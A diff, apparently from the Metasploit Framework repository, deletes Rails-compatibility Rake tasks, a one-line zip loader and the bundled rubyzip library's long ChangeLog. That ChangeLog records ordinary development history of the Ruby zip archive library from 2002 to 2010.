-# Rake tasks added for compatibility with rake tasks that depend on a Rails
-# environment, such as those in activerecord
-
-# Would normally load config/environment.rb of the rails application.
-#
-# @see https://github.com/rails/rails/blob/e2908356672d4459ada0064f773efd820efda822/railties/lib/rails/application.rb#L190
-task :environment do
-	# ensures that Mdm models are available for migrations which use the models
-	MetasploitDataModels.require_models
-
-	# avoids the need for Rails.root in db:schema:dump
-	schema_pathname = Metasploit::Framework.root.join('db', 'schema.rb')
-	ENV['SCHEMA'] = schema_pathname.to_s
-end
-
-# This would normally default RAILS_ENV to development if ENV['RAILS_ENV'] is
-# not set
-#
-# @see https://github.com/rails/rails/blob/1a275730b290c1f06d4e8df680d22ae1b41ab585/railties/lib/rails/tasks/misc.rake#L3
-task :rails_env do
-end
diff --git a/lib/zip.rb b/lib/zip.rb
deleted file mode 100644
index 5a89853ce1..0000000000
--- a/lib/zip.rb
+++ /dev/null
@@ -1 +0,0 @@
-require 'zip/zip'
diff --git a/lib/zip/ChangeLog b/lib/zip/ChangeLog
deleted file mode 100644
index 63bf7858f0..0000000000
--- a/lib/zip/ChangeLog
+++ /dev/null
@@ -1,1146 +0,0 @@
-2010-01-01 13:43  thomas
-
-	* NEWS, lib/zip/zip.rb, test/ziptest.rb: Changed
-	  ZipOutputStream.put_next_entry to make it possible to specifiy
-	  comments, extra field and compression method.
-
-2009-12-31 16:25  thomas
-
-	* Rakefile: Updated publish method.
-
-2009-11-27 22:59  thomas
-
-	* NEWS, lib/zip/zip.rb: Bumped micro number and updated NEWS file.
-
-	* lib/zip/zip.rb: Provide convenience methods for retrieving name
-	  and comments in character encoding of choice (pending ruby
-	  character String class).
-
-2009-04-05 12:28  thomas
-
-	* install.rb, lib/zip/zip.rb, samples/example_filesystem.rb,
-	  test/zipfilesystemtest.rb, test/ziptest.rb: Applied ruby-1.9
-	  compatibility patch from Yuya Nishida.
-
-2008-08-26 20:49  thomas
-
-	* lib/zip/zip.rb: Rewrote fix for rename bug.
-
-2008-08-24 14:34  thomas
-
-	* lib/zip/zip.rb, test/ziptest.rb: Refixed rename to avoid
-	  decompressing and recompressing entry.
-
-2008-08-24 11:43  drylight
-
-	* NEWS, README, Rakefile, lib/zip/zip.rb: Update version number and
-	  minor release note changes.
-
-	* NEWS, README, lib/zip/zip.rb, test/ziptest.rb: Fixed: Renaming an
-	  entry failed if the entry's new name was a different length than
-	  its old name.
-
-2006-12-24 11:42  thomas
-
-	* lib/zip/: ioextras.rb, zip.rb: Added IOExtras.copy_stream_n and
-	  used it to avoid loading large entries into memory when copying
-	  from one stream to another.
-
-2006-12-17 15:03  thomas
-
-	* lib/zip/zip.rb: Bug 1614537 Version needed to extract set.
-
-2006-11-21 09:12  thomas
-
-	* lib/zip/zipfilesystem.rb, test/zipfilesystemtest.rb: Bug 1600222
-	  Fixed it so ZipFsFile#open accepts and ignores b(inary) option.
-
-2006-09-05 22:53  thomas
-
-	* test/zipfilesystemtest.rb: Avoid warnings while running tests.
-
-2006-08-04 19:56  technorama
-
-	* lib/zip/zip.rb: bugfix: :link -> :symlink
-
-2006-07-01 10:04  thomas
-
-	* Rakefile: Don't autorequire zip/zip - autorequire is deprecated.
-
-2006-06-30 09:28  thomas
-
-	* Rakefile: [no log message]
-
-	* NEWS, lib/zip/zip.rb: Bumped version number and reformatted NEWS
-	  a bit.
-
-2006-06-29 22:49  technorama
-
-	* lib/zip/zip.rb, NEWS: documentation additions
-
-2006-04-30 06:25  technorama
-
-	* TODO, lib/zip/zip.rb, test/ziptest.rb: add documentation and test
-	  for new ZipFile::extract
-
-	* lib/zip/zip.rb: add some of the API suggestions from sf.net
-	  #1281314
-
-	* lib/zip/zip.rb: apply patch for bug #1446926
-
-	* lib/zip/zip.rb: apply patch for bug #1459902
-
-2006-04-26 17:17  technorama
-
-	* lib/zip/zip.rb: add ZipFile @restore_*, documentation update
-
-2006-04-07 21:13  technorama
-
-	* test/: gentestfiles.rb, zipfilesystemtest.rb, ziptest.rb:
-	  additional tests
-
-2006-03-28 04:11  technorama
-
-	* lib/zip/zip.rb: start of unix_uid, unix_gid, restore_* support
-
-	* lib/zip/zip.rb: follow_symlinks is now optional
-
-	* lib/zip/zip.rb: add eof? methods
-
-	* test/ziptest.rb: eof? tests
-
-2006-02-26 09:57  technorama
-
-	* README: add to authors
-
-	* TODO: [no log message]
-
-2006-02-25 12:04  thomas
-
-	* lib/zip/zip.rb, test/ziptest.rb: Did away with ZipStreamableFile.
-
-2006-02-23 08:03  technorama
-
-	* lib/zip/zip.rb: unix file permissions.  symlink support.  rework
-	  ZipEntry and delegate classes.  reduce memory usage during
-	  decompression.
-
-2006-02-22 23:44  technorama
-
-	* lib/zip/zipfilesystem.rb: update permissionInt for mkdir
-
-2006-02-04 10:42  thomas
-
-	* lib/zip/: ioextras.rb, zip.rb: Merged patch from oss-ruby.
-
-2005-11-19 16:17  thomas
-
-	* lib/zip/zip.rb: [no log message]
-
-2005-11-08 08:23  thomas
-
-	* lib/zip/ioextras.rb: Accepted patch from oss-ruby
-
-2005-10-07 09:54  thomas
-
-	* TODO: [no log message]
-
-2005-09-06 21:19  thomas
-
-	* lib/zip/zip.rb: [no log message]
-
-	* NEWS: [no log message]
-
-	* lib/zip/zip.rb, test/gentestfiles.rb, test/ziptest.rb: Fixed
-	  problem on windows - tempfile has to be set to binmode again when
-	  it is reopened
-
-2005-09-04 16:45  thomas
-
-	* Rakefile: [no log message]
-
-	* TODO: [no log message]
-
-	* test/ziptest.rb: [no log message]
-
-2005-09-03 10:27  thomas
-
-	* NEWS: [no log message]
-
-	* TODO, lib/zip/zip.rb: [no log message]
-
-	* lib/zip/ioextras.rb, lib/zip/zip.rb, test/ziptest.rb: Merged
-	  patch from oss-ruby at technorama.net
-
-	* test/ziptest.rb: Added failing test that shows that read and gets
-	  don't mix currently
-
-2005-08-29 08:50  thomas
-
-	* lib/zip/: ioextras.rb, zip.rb: [no log message]
-
-	* NEWS, lib/zip/zip.rb: [no log message]
-
-	* lib/zip/zip.rb: [no log message]
-
-	* lib/zip/zip.rb: [no log message]
-
-2005-08-07 14:27  thomas
-
-	* lib/zip/zip.rb, NEWS: [no log message]
-
-2005-08-06 11:12  thomas
-
-	* lib/zip/: ioextras.rb, zip.rb: [no log message]
-
-2005-08-03 18:54  thomas
-
-	* lib/zip/zip.rb: Read/write in chunks to preserve memory
-
-2005-07-02 15:08  thomas
-
-	* lib/zip/zip.rb: Applied received patch concerning FreeBSD 4.5
-	  issue
-
-2005-04-03 16:52  thomas
-
-	* samples/.cvsignore: [no log message]
-
-	* samples/: qtzip.rb, zipdialogui.ui: Added a qt example
-
-2005-03-31 21:58  thomas
-
-	* lib/zip/zip.rb, test/ziptest.rb: [no log message]
-
-	* test/zipfilesystemtest.rb: [no log message]
-
-2005-03-17 18:17  thomas
-
-	* Rakefile: [no log message]
-
-	* NEWS, README, lib/zip/zip.rb: [no log message]
-
-	* install.rb: Fixed install.rb
-
-2005-03-03 18:38  thomas
-
-	* Rakefile: [no log message]
-
-2005-02-27 16:23  thomas
-
-	* lib/zip/ziprequire.rb: Added documentation to ziprequire
-
-	* README, TODO, lib/zip/ziprequire.rb: Added documentation to
-	  ziprequire
-
-	* Rakefile, test/ziptest.rb: [no log message]
-
-2005-02-19 21:30  thomas
-
-	* lib/zip/ioextras.rb, lib/zip/stdrubyext.rb,
-	  lib/zip/tempfile_bugfixed.rb, lib/zip/zip.rb,
-	  lib/zip/ziprequire.rb, test/ioextrastest.rb,
-	  test/stdrubyexttest.rb, test/zipfilesystemtest.rb,
-	  test/ziprequiretest.rb, test/ziptest.rb: Added more rdoc and
-	  changed the remaining tests to Test::Unit
-
-	* lib/zip/: ioextras.rb, zip.rb: Added documentation to
-	  ZipInputStream and ZipOutputStream
-
-2005-02-18 10:27  thomas
-
-	* README: [no log message]
-
-2005-02-17 23:21  thomas
-
-	* README, Rakefile: Added ppackage (publish package) task to
-	  Rakefile
-
-	* README, Rakefile, TODO: Added pdoc (publish doc) task to Rakefile
-
-	* README, Rakefile, TODO, lib/zip/stdrubyext.rb, lib/zip/zip.rb,
-	  lib/zip/zipfilesystem.rb: Added a bunch of documentation
-
-	* test/ziptest.rb: [no log message]
-
-2005-02-16 20:04  thomas
-
-	* NEWS, README, Rakefile: Improved documentation and added rdoc
-	  task to Rakefile
-
-	* NEWS, Rakefile, lib/zip/zip.rb: [no log message]
-
-	* Rakefile, samples/example.rb, samples/example_filesystem.rb,
-	  samples/gtkRubyzip.rb, samples/write_simple.rb,
-	  samples/zipfind.rb, test/.cvsignore, test/gentestfiles.rb:
-	  Improvements to Rakefile
-
-2005-02-15 23:35  thomas
-
-	* NEWS, TODO: [no log message]
-
-	* Rakefile, rubyzip.gemspec: Now uses Rake to build gem
-
-	* Rakefile: [no log message]
-
-	* lib/zip/zip.rb, test/.cvsignore, test/ziptest.rb, NEWS: Fixed
-	  compatibility issue with ruby 1.8.2. Migrated test suite to
-	  Test::Unit
-
-	* NEWS, lib/zip/ioextras.rb, lib/zip/stdrubyext.rb,
-	  lib/zip/tempfile_bugfixed.rb, lib/zip/zip.rb,
-	  lib/zip/zipfilesystem.rb, lib/zip/ziprequire.rb, test/.cvsignore,
-	  test/file1.txt, test/file1.txt.deflatedData, test/file2.txt,
-	  test/gentestfiles.rb, test/ioextrastest.rb,
-	  test/notzippedruby.rb, test/rubycode.zip, test/rubycode2.zip,
-	  test/stdrubyexttest.rb, test/testDirectory.bin,
-	  test/zipWithDirs.zip, test/zipfilesystemtest.rb,
-	  test/ziprequiretest.rb, test/ziptest.rb, test/data/.cvsignore,
-	  test/data/file1.txt, test/data/file1.txt.deflatedData,
-	  test/data/file2.txt, test/data/notzippedruby.rb,
-	  test/data/rubycode.zip, test/data/rubycode2.zip,
-	  test/data/testDirectory.bin, test/data/zipWithDirs.zip: Changed
-	  directory structure
-
-2005-02-13 22:44  thomas
-
-	* Rakefile, TODO: [no log message]
-
-	* rubyzip.gemspec: [no log message]
-
-	* install.rb: Made install.rb independent of the current path
-	  (fixes bug reported by Drew Robinson)
-
-2004-12-12 11:22  thomas
-
-	* NEWS, TODO, samples/write_simple.rb: Fixed 'version needed to
-	  extract'-field wrong in local headers
-
-2004-05-02 15:17  thomas
-
-	* rubyzip.gemspec: Added gemspec contributed by Chad Fowler
-
-2004-04-02 07:25  thomas
-
-	* NEWS: Fix for FreeBSD 4.9
-
-2004-03-29 00:28  thomas
-
-	* NEWS: [no log message]
-
-2004-03-28 17:59  thomas
-
-	* NEWS: [no log message]
-
-2004-03-27 16:09  thomas
-
-	* test/stdrubyexttest.rb: Patch for stdrubyext.rb from Nobu Nakada
-
-	* test/: ioextrastest.rb, stdrubyexttest.rb: converted some files
-	  to unix line-endings
-
-2004-03-25 16:34  thomas
-
-	* NEWS, install.rb: Significantly reduced memory footprint when
-	  modifying zip files
-
-2004-03-16 18:20  thomas
-
-	* install.rb, test/alltests.rb, test/ioextrastest.rb,
-	  test/stdrubyexttest.rb, test/ziptest.rb: IO utility classes moved
-	  to new file ioextras.rb. Tests moved to new file ioextrastest.rb
-
-2004-02-27 13:21  thomas
-
-	* NEWS: Optimization to avoid decompression and recompression
-
-2004-01-30 16:17  thomas
-
-	* NEWS: [no log message]
-
-	* README, test/zipfilesystemtest.rb, test/ziptest.rb: Applied
-	  extra-field patch
-
-2003-12-13 16:57  thomas
-
-	* TODO: [no log message]
-
-2003-12-10 00:25  thomas
-
-	* test/ziptest.rb: (Temporary) fix to bug reported by Takashi Sano
-
-2003-08-23 09:42  thomas
-
-	* test/ziptest.rb, NEWS: Fixed ZipFile.get_ouput_stream bug - data
-	  was never written to zip
-
-2003-08-21 16:05  thomas
-
-	* install.rb: [no log message]
-
-	* alltests.rb, stdrubyexttest.rb, zipfilesystemtest.rb,
-	  ziprequiretest.rb, ziptest.rb, test/alltests.rb,
-	  test/stdrubyexttest.rb, test/zipfilesystemtest.rb,
-	  test/ziprequiretest.rb, test/ziptest.rb: Moved all test ruby
-	  files to test/
-
-	* NEWS, install.rb, stdrubyext.rb, stdrubyexttest.rb, zip.rb,
-	  zipfilesystem.rb, zipfilesystemtest.rb, ziprequire.rb,
-	  ziprequiretest.rb, ziptest.rb, samples/example.rb,
-	  samples/example_filesystem.rb, samples/gtkRubyzip.rb,
-	  samples/zipfind.rb: Moved all production source files to zip/ so
-	  they are in the same dir as when they are installed
-
-	* NEWS, TODO, alltests.rb: [no log message]
-
-	* filearchive.rb, filearchivetest.rb, fileutils.rb: Removed
-	  filearchive.rb, filearchivetest.rb and fileutils.rb
-
-	* samples/.cvsignore, samples/example_filesystem.rb, zip.rb,
-	  samples/example_filesystem.rb: Added
-	  samples/example_filesystem.rb. Fixed Tempfile creation for
-	  entries created with get_output_stream where entries were in a
-	  subdirectory
-
-	* zip.rb, ziptest.rb: Fixed mkdir bug. ZipFile.mkdir didn't work if
-	  the zipfile doesn't exist already
-
-	* ziptest.rb: [no log message]
-
-	* TODO, zipfilesystemtest.rb: Globbing test placeholder commented
-	  out
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented ZipFsDir.new
-	  and open
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented DirFsIterator
-	  and tests
-
-2003-08-20 22:50  thomas
-
-	* NEWS, TODO: [no log message]
-
-	* zipfilesystemtest.rb: [no log message]
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented
-	  ZipFsDir.foreach, ZipFsDir.entries now reimplemented in terms of
-	  it
-
-	* README: [no log message]
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: [no log message]
-
-	* zipfilesystem.rb: All access from ZipFsFile and ZipFsDir to
-	  ZipFile is now routed through ZipFileNameMapper which has the
-	  single responsibility of mapping entry/filenames
-
-	* alltests.rb, stdrubyext.rb, stdrubyexttest.rb: Added
-	  stdrubyexttest.rb and added test test_select_map
-
-	* zipfilesystem.rb: ZipFsDir was in the wrong module. ZipFileSystem
-	  now has a ctor that creates ZipFsDir and ZipFsFile instances,
-	  instead of creating them lazily. It then passes the dir instance
-	  to the file instance and vice versa
-
-	* zip.rb, zipfilesystem.rb, zipfilesystemtest.rb: ZipFsFile.open
-	  honours chdir
-
-	* stdrubyext.rb, zip.rb, zipfilesystem.rb, zipfilesystemtest.rb,
-	  ziptest.rb: Fixed ZipEntry::parent_as_string. Implemented
-	  ZipFsDir.chdir, pwd and entries including test
-
-2003-08-19 15:44  thomas
-
-	* zip.rb, zipfilesystem.rb, zipfilesystemtest.rb: Implemented
-	  ZipFsDir.mkdir
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented
-	  ZipFsDir.delete (and aliases rmdir and unlink)
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Another dummy
-	  implementation and commented out a test for select() which can be
-	  added later
-
-2003-08-18 20:40  thomas
-
-	* ziptest.rb: Honoured 1.8.0 Object.to_a deprecation warning
-
-	* zip.rb, ziptest.rb, samples/example.rb, samples/zipfind.rb:
-	  Converted a few more names to ruby underscore style that I missed
-	  with the automated processing the first time around
-
-	* zip.rb, zipfilesystem.rb, zipfilesystemtest.rb, ziptest.rb:
-	  Implemented Zip::ZipFile.get_output_stream
-
-2003-08-17 18:28  thomas
-
-	* README, install.rb, stdrubyext.rb, zipfilesystem.rb,
-	  zipfilesystemtest.rb: Updated README with Documentation section.
-	  Updated install.rb. Fixed three tests that failed on 1.8.0.
-
-2003-08-14 05:40  thomas
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Added empty
-	  implementations of atime and ctime
-
-2003-08-13 17:08  thomas
-
-	* simpledist.rb: Moved simpledist to a separate repository called
-	  'misc'
-
-	* NEWS: [no log message]
-
-	* stdrubyext.rb, zip.rb, zipfilesystem.rb, zipfilesystemtest.rb,
-	  ziprequire.rb, ziprequiretest.rb, ziptest.rb, samples/example.rb,
-	  samples/gtkRubyzip.rb, samples/zipfind.rb: Changed all method
-	  names to the ruby convention underscore style
-
-	* alltests.rb, zipfilesystem.rb, zipfilesystemtest.rb: Implemented
-	  a lot more of the stat methods. Mostly with dummy implementations
-	  that return values that indicate that these features aren't
-	  supported
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented more methods
-	  and tests in zipfilesystem. Mostly empty methods as permissions
-	  and file types other than files and directories are not supported
-
-	* install.rb, stdrubyext.rb, zip.rb, zipfilesystem.rb,
-	  zipfilesystemtest.rb: Addd file stdrubyext.rb and moved the
-	  modifications to std ruby classes to it. Refactored the ZipFsStat
-	  tests and ZipFsStat. Added Module.forwardMessages and used it to
-	  implement the forwarding of calls in ZipFsStat
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Added
-	  Zip::ZipFsFile::ZipFsStat and started implementing it and its
-	  methods
-
-	* zipfilesystem.rb, zipfilesystemtest.rb, ziptest.rb: Updated and
-	  added missing copyright notices
-
-	* zip.rb, zipfilesystem.rb, zipfilesystemtest.rb: zipfilesystem.rb
-	  is becoming big and not everyone will want to use that code.
-	  Therefore zip.rb no longer requires it. Instead you must require
-	  zipfilesystem.rb itself if you want to use it
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented dummy
-	  permission test methods
-
-	* TODO, zip.rb, ziptest.rb: Merged from patch from Kristoffer
-	  Lunden. Fixed more 1.8.0 incompatibilites - tests run on 1.8.0
-	  now
-
-2003-08-12 19:18  thomas
-
-	* zip.rb: Get rid of 1.8.0 warning
-
-	* ziptest.rb: ruby 1.8.0 compatibility fix
-
-	* NEWS, zip.rb: ruby-zlib 0.6.0 compatibility fix
-
-2002-12-22 20:12  thomas
-
-	* zip.rb: [no log message]
-
-2002-09-16 22:11  thomas
-
-	* NEWS: [no log message]
-
-2002-09-15 17:16  thomas
-
-	* samples/zipfind.rb: [no log message]
-
-	* samples/zipfind.rb: [no log message]
-
-2002-09-14 22:59  thomas
-
-	* samples/zipfind.rb: Added simple zipfind script
-
-2002-09-13 23:53  thomas
-
-	* TODO: Added TODO about openmode for zip entries binary/ascii
-
-	* NEWS: ziptest now runs without errors with ruby-1.7.2-4 (Andy's
-	  latest build)
-
-	* zip.rb, ziprequiretest.rb, ziptest.rb: ziptest now runs without
-	  errors with ruby-1.7.2-4 (Andy's latest build)
-
-2002-09-12 00:20  thomas
-
-	* zipfilesystemtest.rb: Improved ZipFsFile.delete/unlink test
-
-	* test/.cvsignore: [no log message]
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented
-	  ZipFsFile.delete/unlink
-
-2002-09-11 22:22  thomas
-
-	* alltests.rb: [no log message]
-
-	* NEWS, zip.rb, zipfilesystem.rb, zipfilesystemtest.rb: Fixed
-	  AbstractInputStream.each_line ignored its aSeparator argument.
-	  Implemented more ZipFsFile methods
-
-	* zip.rb, zipfilesystem.rb, zipfilesystemtest.rb: ZipFileSystem is
-	  now a module instead of a class, and is mixed into ZipFile,
-	  instead of being made available as a property fileSystem
-
-2002-09-10 23:45  thomas
-
-	* NEWS: Updated NEWS file
-
-	* zip.rb: [no log message]
-
-	* NEWS, zip.rb, ziptest.rb: Fix bug: rewind should reset lineno.
-	  Fix bug: Deflater.read uses separate buffer from produceInput
-	  (feeding gets/readline etc)
-
-2002-09-09 23:48  thomas
-
-	* .cvsignore: [no log message]
-
-2002-09-09 22:55  uid26649
-
-	* zip.rb, ziptest.rb: Implemented ZipInputStream.rewind and
-	  AbstractInputStream.lineno. Tests for both
-
-2002-09-09 20:31  thomas
-
-	* zip.rb, ziptest.rb: ZipInputStream and ZipOutstream (thru their
-	  AbstractInputStream and AbstractOutputStream now lie about being
-	  kind_of?(IO)
-
-2002-09-08 16:38  thomas
-
-	* zipfilesystemtest.rb: [no log message]
-
-	* filearchive.rb, filearchivetest.rb, zip.rb, ziptest.rb: Moved
-	  String additions from filearchive.rb to zip.rb (and moved tests
-	  along too to ziptest.rb). Added ZipEntry.parentAsString and
-	  ZipEntrySet.parent
-
-	* ziptest.rb: Implemented ZipEntrySetTest.testDup and testCompound
-
-	* TODO, zip.rb, ziptest.rb: Replaced Array with EntrySet for
-	  keeping entries in a zip file. Tagged repository before this
-	  commit, so this change can be rolled back, if it stinks
-
-2002-09-07 20:21  thomas
-
-	* zip.rb, ziptest.rb: Implemented ZipEntry.<=>
-
-	* ziptest.rb: Removed unused code
-
-2002-08-11 15:14  thomas
-
-	* zip.rb, ziptest.rb: Made some changes to accomodate ruby 1.7.2
-
-2002-07-27 15:25  thomas
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented ZipFsFile.new
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented
-	  ZipFsFile.pipe
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented
-	  ZipFsFile.link
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented
-	  ZipFsFile.symlink
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented
-	  ZipFsFile.readlink, wrapped ZipFileSystem class in Zip module
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented
-	  ZipFsFile.zero?
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented test for
-	  ZipFsFile.directory?
-
-2002-07-26 23:56  thomas
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented
-	  ZipFsFile.socket?
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented
-	  ZipFsFile.join
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented
-	  ZipFsFile.ftype
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented
-	  ZipFsFile.blockdev?
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented
-	  ZipFsFile.size? (slightly different from size)
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented
-	  ZipFsFile.split
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implemented
-	  ZipFsFile.symlink?
-
-	* alltests.rb, zip.rb, zipfilesystem.rb, zipfilesystemtest.rb:
-	  Implemented ZipFsFile.mtime
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: Implement ZipFsFile.file?
-
-	* zip.rb, ziptest.rb: Implemented ZipEntry.file?
-
-	* alltests.rb, filearchive.rb, filearchivetest.rb, zip.rb,
-	  zipfilesystem.rb, zipfilesystemtest.rb, ziprequire.rb,
-	  ziptest.rb: Implemented ZipFileSystem::ZipFsFile.size
-
-	* zipfilesystem.rb, zipfilesystemtest.rb: [no log message]
-
-	* test/zipWithDirs.zip: Changed zipWithDirs.zip so all the entries
-	  in it have unix file endings
-
-	* alltests.rb, zip.rb, zipfilesystem.rb, zipfilesystemtest.rb:
-	  Started implementing ZipFileSystem
-
-	* test/zipWithDirs.zip: Added a zip file for testing with a
-	  directory structure
-
-2002-07-22 21:40  thomas
-
-	* TODO: [no log message]
-
-	* TODO: [no log message]
-
-2002-07-21 18:20  thomas
-
-	* NEWS: [no log message]
-
-	* TODO: Updated TODO with a refactoring idea for FileArchive
-
-	* filearchive.rb, filearchivetest.rb: Added some FileArchiveAdd
-	  tests and cleaned up some of the FileArchive tests. extract and
-	  add now have individual test fixtures.
-
-	* filearchive.rb, filearchivetest.rb: Added tests for extract
-	  called with regex src arg and Enumerable src arg
-
-	* filearchivetest.rb: Added test for continueOnExistsProc when
-	  extracting from a file archive
-
-2002-07-20 17:13  thomas
-
-	* TODO, filearchivetest.rb, fileutils.rb, ziptest.rb,
-	  test/.cvsignore: Added (failing) tests for FileArchive.add, added
-	  code for creating test files for FileArchive.add tests. Added
-	  fileutils.rb, which is borrowed from ruby 1.7.2
-
-	* filearchive.rb, filearchivetest.rb: [no log message]
-
-	* filearchivetest.rb: Added tests for String extensions
-
-	* alltests.rb, ziprequiretest.rb, ziptest.rb: [no log message]
-
-	* install.rb: [no log message]
-
-	* TODO: Updated TODO
-
-	* filearchive.rb, filearchivetest.rb: All FileArchive.extract tests
-	  run
-
-2002-07-19 23:11  thomas
-
-	* filearchive.rb, filearchivetest.rb: [no log message]
-
-	* filearchivetest.rb: [no log message]
-
-	* filearchive.rb, filearchivetest.rb: [no log message]
-
-	* filearchive.rb, filearchivetest.rb, zip.rb: [no log message]
-
-2002-07-08 13:41  thomas
-
-	* TODO: [no log message]
-
-2002-06-11 19:47  thomas
-
-	* filearchive.rb, filearchivetest.rb, zip.rb, ziptest.rb: [no log
-	  message]
-
-2002-05-25 00:41  thomas
-
-	* simpledist.rb: Added hackish script for creating dist files
-
-2002-04-30 21:22  thomas
-
-	* TODO: [no log message]
-
-	* filearchive.rb, filearchivetest.rb: [no log message]
-
-	* filearchive.rb, filearchivetest.rb: Improved testing and wrote
-	  some of the skeleton of extract. Still to do: Fix glob, so it
-	  returns a hashmap instead of a list. The map will need to map the
-	  full entry name to the last part of the name (which is only
-	  really interesting for recursively extracted entries, otherwise
-	  it is just the name). Glob.expandPathList should also output
-	  directories with a trailing slash, which is doesn't right now.
-
-	* filearchive.rb, filearchivetest.rb: Implemented the first few
-	  tests for FileArchive
-
-2002-04-24 22:06  thomas
-
-	* ziprequire.rb, ziprequiretest.rb: Appended copyright message to
-	  ziprequire.rb and ziprequiretest.rb
-
-	* zip.rb: Made ZipEntry tolerate invalid dates
-
-2002-04-21 00:57  thomas
-
-	* NEWS, TODO, zip.rb, ziptest.rb: Read and write entry modification
-	  date/time correctly
-
-2002-04-20 02:44  thomas
-
-	* ziprequiretest.rb, test/rubycode2.zip: improved ZipRequireTest
-
-	* ziprequire.rb: Made a warning go away
-
-	* ziprequire.rb, ziprequiretest.rb, test/notzippedruby.rb,
-	  test/rubycode.zip: Fixed a bug in ziprequire. Added
-	  ziprequiretest.rb and test data files
-
-2002-04-19 22:43  thomas
-
-	* zip.rb, ziptest.rb: Added recursion support to Glob module
-
-2002-04-18 21:37  thomas
-
-	* NEWS, TODO, zip.rb, ziptest.rb: Added Glob module and GlobTest
-	  unit test suite. This module provides the functionality to expand
-	  a 'glob pattern' given a list of files - Next step is to use this
-	  module in ZipFile
-
-2002-04-01 22:55  thomas
-
-	* NEWS: [no log message]
-
-	* TODO, zip.rb, ziprequire.rb: Added ziprequire.rb which contains a
-	  proof-of-concept implementation of a require implementation that
-	  can load ruby modules from a zip file. Needs unit tests and
-	  polish.
-
-2002-03-31 01:13  thomas
-
-	* README: [no log message]
-
-2002-03-30 16:14  thomas
-
-	* TODO: [no log message]
-
-	* .cvsignore, README, zip.rb: Added rdoc markup (only #:nodoc:all
-	  modifiers) to zip.rb. Made README 'RDoc compliant'
-
-2002-03-29 23:29  thomas
-
-	* TODO: [no log message]
-
-	* example.rb, samples/.cvsignore, samples/example.rb,
-	  samples/gtkRubyzip.rb: Moved example.rb to samples/. Added
-	  another sample gtkRubyzip.rb
-
-	* NEWS, TODO, TODO: [no log message]
-
-	* .cvsignore, file1.txt, file1.txt.deflatedData, testDirectory.bin,
-	  ziptest.rb, test/.cvsignore, test/file1.txt,
-	  test/file1.txt.deflatedData, test/file2.txt,
-	  test/testDirectory.bin: Added test/ directory and moved the
-	  manually created test data files into it. Changed ziptest.rb so
-	  it runs in test/ directory
-
-	* TODO: [no log message]
-
-	* NEWS, zip.rb, ziptest.rb: Don't decompress and recompress zip
-	  entries when changing zip file
-
-	* zip.rb: Performance optimization: Only write new ZipFile, if it
-	  has been changed. The test suite runs in half the time now.
-
-2002-03-28 22:12  thomas
-
-	* TODO: [no log message]
-
-2002-03-23 17:31  thomas
-
-	* TODO: [no log message]
-
-2002-03-22 22:47  thomas
-
-	* NEWS: [no log message]
-
-	* NEWS, TODO: [no log message]
-
-	* ziptest.rb: Found the tests that didn't use blocks to make sure
-	  input streams are closed as soon as they arent used anymore and
-	  got rid of the GC.start
-
-	* ziptest.rb: All tests run on windows ruby 1.6.6
-
-	* zip.rb, ziptest.rb: Windows fixes: Fixed ZipFile.initialize which
-	  needed to open zipfile file in binary mode. Added another
-	  workaround for the return value from File.open(name) where name
-	  is the name of a directory - ruby returns different exceptions in
-	  linux, win/cygwin and windows. A number of tests failed because
-	  in windows you cant delete a file that is open. Fixed by changing
-	  ziptest.rb to use ZipInputStream.getInputStream with blocks a few
-	  places. There is a hack in CommanZipFileFixture.setup where the
-	  GC is explicitly invoked. Should be fixed with blocks instead.
-	  The only currently failing test fails because the test data
-	  creation fails to add a comment to 4entry.zip, because echo eats
-	  the remainder of the line including the pipe character and the
-	  following zip -z 4 entry.zip command
-
-2002-03-21 22:18  thomas
-
-	* NEWS: [no log message]
-
-	* NEWS, README, TODO, install.rb: Added install.rb
-
-	* ziptest.rb: [no log message]
-
-	* NEWS, TODO: [no log message]
-
-	* .cvsignore, TODO, zip.rb, ziptest.rb: Added
-	  test_extractDirectoryExistsAsFileOverwrite and fixed to pass
-
-	* zip.rb, ziptest.rb: Extraction of directory entries is now
-	  supported
-
-2002-03-20 21:59  thomas
-
-	* NEWS: [no log message]
-
-	* COPYING, README, README.txt: Removed COPYING, renamed README.txt
-	  to README. Updated README
-
-	* example.rb: Fixed example.rb added example that shows zip file
-	  manipulation with Zip::ZipFile
-
-	* .cvsignore: [no log message]
-
-	* TODO, zip.rb, ziptest.rb: Directories can now be added (not
-	  recursively, the directory entry itself. Directories are
-	  recognized by a empty entries with a trailing /. The purpose of
-	  storing them explicitly in the zip file is to be able to store
-	  permission and ownership information
-
-	* TODO, zip.rb, ziptest.rb: zip.rb depended on ftools but it was
-	  only included in ziptest.rb
-
-	* zip.rb, ziptest.rb: ZipError is now a subclass of StandardError
-	  instead of RuntimeError. ZipError now has several subclasses.
-
-2002-03-19 22:26  thomas
-
-	* TODO: [no log message]
-
-	* TODO, ziptest.rb: Unit test ZipFile.getInputStream with block
-
-	* TODO, zip.rb, ziptest.rb: Unit test for adding new entry with
-	  name that already exists in archive, and fixed to pass test
-
-	* TODO, zip.rb, ziptest.rb: Added unit tests for rename to existing
